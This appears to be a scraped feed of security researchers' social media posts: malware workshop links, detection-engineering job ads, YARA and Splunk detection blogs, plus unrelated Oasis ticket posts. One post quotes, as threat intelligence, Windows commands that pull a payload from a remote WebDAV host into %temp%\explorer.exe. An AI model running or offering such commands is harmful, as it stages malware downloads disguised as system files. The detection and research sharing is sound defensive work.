I've hosted several malware analysis workshops over the past few years, I've collected those on YouTube and added to the following playlist 👇 youtube.com/playlist?list=… Samples from the workshops have been archived on Github: 👉 github.com/jstrosch/malwa…

Example commands to copy files included: cmd.exe /c "extrac32 /Y /C \\64.52.80[.]221@80\udXyzMes\jquery %temp%\explorer.exe cmd.exe /c "findstr /V /L egwwge \\64.52.80[.]221@80\QUnsVajK\jquery > %temp%\explorer.exe cmd.exe /c "type \\64.52.80[.]221@80\FkFiTPvB\jquery >

We are scouting for reverse engineering talent to contribute to Microsoft’s intelligence mission: jobs.careers.microsoft.com/global/en/job/… I can’t guarantee you will understand the vast security data, but I can promise you will often be the first human defender to ever look at a certain malicious

new role opened for someone who loves crafting detections, threat intel, and all the goodness of smashing bad in email: jobs.careers.microsoft.com/global/en/job/… happy to answer any questions

🎉 Updated ASRGEN🚨 If you haven't been following along, Microsoft recently added two new ASR rules in preview. - Block rebooting machine in Safe Mode (preview) - Block use of copied or impersonated system tools (preview) 1. learn.microsoft.com/en-us/microsof… 2. learn.microsoft.com/en-us/microsof…

On 14 Mar 2024 around 2115 UTC, #Gootloader changed the #JavaScript library it hides in to Apache ECharts. The zip changed from around 720 KB to 5 MB. The .JS inside is now 22.5 MB. Created a new #YARA rule to detect it github.com/GootloaderSite…

Extremely proud of splunk.com/en_us/blog/sec… the latest blog on #WINELOADER by Br3akp0int The Haag™ and the #STRT team. My favorite things are: ⛓️ Super simple to understand the attack chain 🚗 [cue meme] this puppy fits soo many #atomicredteam tests 🛡️ Splunk detections! 1/x

I'll just leave this here... github.com/wmetcalf/msc_d…

Happy to share this #STRT blog focusing on how attacker weaponized .LNK files in several phishing campaigns. In this blog we analyzed several malicious LNK to extract TTP’s for #detections and #simulation dev. enjoy reading! #int3 #splunk #cisco splunk.com/en_us/blog/sec…

Moar soon! Big updates coming

“Oi bruv me gonna nab some Oasis tickets innit”

Liam and Noel Gallagher seemingly confirmed that an Oasis reunion is happening after sharing a cryptic clip on social media on Sunday. variety.com/2024/music/new…

“This is it, this is happening” Tickets on sale this Saturday 31st August (🇮🇪8AM IST / 🇬🇧9AM BST) Dates: Cardiff Principality Stadium - 4th/5th July Manchester Heaton Park - 11th/12th/19th/20th July London Wembley Stadium - 25th/26th July & 2nd/3rd August Edinburgh Scottish Gas

“America. Oasis is coming. You have one last chance to prove that you loved us all along.” Oasis will tour North America in 2025! Register for the North American ticket pre-sale private ballot 👉OasisMusic.lnk.to/L25NAmPS The pre-sale will take place Thursday, 3rd October. Tickets

I'll just leave this here... github.com/wmetcalf/rdp_h…

For the 2 people who probably care I took a stab at adding cert validation, SAN extraction, and missing/invalid certs. github.com/wmetcalf/rdp_h…

Enjoy punching phish? Experience writing detections for phish, using regex, Yara, etc., and looking to grow as a researcher within an experienced team? Join me and the rest of the Splunk Attack Analyzer Misfits of Detection Science. US only, fully remote splunk.com/en_us/careers/…

Talk about ending the week on a high note. 🎉 With Cisco's acquisition of SnapAttack is now part of Cisco now complete, we're looking forward to driving further Splunk innovation as we continue to deliver security solutions that support today's new era of SIEM. Read more here. #SplunkSecurity

github.com/google/securit…